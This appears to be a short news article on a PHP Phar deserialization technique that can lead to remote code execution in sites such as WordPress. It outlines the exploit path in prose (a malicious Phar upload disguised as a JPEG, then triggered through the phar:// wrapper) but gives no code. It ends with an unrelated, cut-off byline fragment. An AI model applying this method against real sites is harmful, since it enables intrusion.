Researchers have discovered a new attack technique that could make it easier for an attacker to trigger critical deserialization vulnerabilities in PHP programming language utilizing previously low-risk functions. The technique leaves hundreds of thousands of web applications vulnerable to remote code execution attacks, including sites that are powered by WordPress and Typo3. In 2009, PHP unserialization/object injection vulnerabilities were documented for the first time. This could allow an attacker to carry out different attacks by supplying malicious inputs to the unserialize PHP function. Researchers claim that “an attacker can use low-risk functions against Phar archives to trigger deserialization attack without requiring the use of unserialize() function in a wide range of scenarios.” Phar files, which are an archive format in PHP store metadata in a serialized format. This will get unserialized whenever a file operation function attempts to access the archive file. To successfully exploit the flaw, all it takes is for the attacker to upload a valid Phar archive that contains the malicious payload object on the target’s local file system and then make the file operation function access it by using the “phar://” stream wrapper. An attacker can also exploit the flaw using a JPEG image by modifying the first 100 bytes. The vulnerability was reported to WordPress last year and a patch was released, however, the patch did not address the issue completely.
By Akshay Rohatgi and Randy Pargman About this Student Research Project Binary Defense’s mission is